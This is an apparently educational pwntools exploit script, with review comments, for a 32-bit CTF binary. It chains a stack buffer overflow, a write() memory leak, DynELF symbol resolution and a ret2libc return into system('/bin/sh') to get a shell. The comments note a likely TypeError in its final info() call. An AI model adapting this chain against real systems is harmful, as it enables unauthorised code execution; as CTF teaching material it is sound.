"""pwntools exploit script for a 32-bit (i386) CTF binary ``./pwn``.

Flow as written: send a 9-byte preamble, then overflow a stack buffer
repeatedly to call ``write`` and leak 4 bytes at an arbitrary address
(``leak``), hand that primitive to pwntools' ``DynELF`` to resolve
``system`` and ``"/bin/sh"`` in libc, and finally overflow once more to
return into ``system``.

Notes:
- Every address below is a hard-coded constant, so the script assumes a
  non-PIE binary mapped at a fixed load address.
- Payloads concatenate ``str`` literals with ``p16``/``p32`` results; that
  only works under Python 2 pwntools (on Python 3 ``str + bytes`` raises
  ``TypeError``).
"""
from pwn import *
import string   # unused in this script
import base64   # unused in this script
import ctypes   # unused in this script
import time     # unused in this script
from LibcSearcher import *   # unused here; symbols are resolved via DynELF below

elf = ELF('./pwn')
context.arch = 'i386'
# Terminal command used by gdb.attach(); no attach happens in this script.
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
# Print every byte sent and received.
context.log_level = 'debug'
p = process('./pwn')

# First stage: 7 NUL bytes followed by 0xE7 as a 16-bit little-endian value.
# What the binary does with it is not visible here; the program answers
# with 'Correct' afterwards (consumed further down).
payload = '\x00'*7 + p16(0xE7)
p.send(payload)

# Hard-coded addresses inside the binary (no PIE assumed).
func_addr = 0x80487d0      # function that is re-entered after each leak
write_addr = 0x8048578     # write() call target (PLT entry, presumably)
pppr_addr = 0x080488f9     # pop; pop; pop; ret gadget to discard write's 3 args
write_symbol = 0x8049FEC   # unused in this script

# a leak that can be repeated (re-entered) is needed
def leak(addr):
    """Leak 4 bytes at ``addr`` by overflowing into write(1, addr, 4).

    Chain layout after 0xeb bytes of filler (0xeb is presumably the distance
    to the saved return address — confirm against the binary): write_addr,
    pppr_addr as write's return address (pops the three arguments), 1, addr,
    4, then func_addr so the vulnerable function runs again and the next
    overflow is possible, followed by 4 filler bytes and 0xE7 — presumably
    mirroring the first-stage input (32-bit here, 16-bit above).

    Returns the first 4 bytes received, which DynELF interprets as the
    little-endian value stored at ``addr``.
    """
    payload = 'a'*0xeb + p32(write_addr) + p32(pppr_addr) + p32(1) + p32(addr) + p32(4) + p32(func_addr) + 'a'*4 + p32(0xE7)
    p.send(payload)
    # NOTE(review): recv() returns whatever is buffered; if anything other
    # than the 4 leaked bytes arrives first, this slice is wrong — there is
    # no recvuntil() guard.
    res = p.recv()[:4]
    return res
# Consume the program's acknowledgement of the first-stage input.
p.recvuntil('Correct\n')
# DynELF resolves libc symbols by reading process memory through leak(),
# so no libc version is needed; it calls leak() many times.
d = DynELF(leak, elf=elf)
sys_addr = d.lookup('system', 'libc')
binsh = d.lookup('str_bin_sh', 'libc')
# Final overflow, laid out as an i386 return into system: target, a fake
# return address (0), then the first argument (pointer to "/bin/sh").
# Assumes the same 0xeb offset as leak() — confirm.
payload = 'a'*0xeb + p32(sys_addr) + p32(0) + p32(binsh)
# NOTE(review): the second %08x argument is p64(0) (a packed 8-byte string),
# not binsh. pwntools' info() applies %-formatting, so this presumably raises
# TypeError before sendline() runs; `binsh` looks like the intended value.
info("sys_addr: 0x%08x,binsh: 0x%08x", sys_addr, p64(0))
p.sendline(payload)
p.interactive()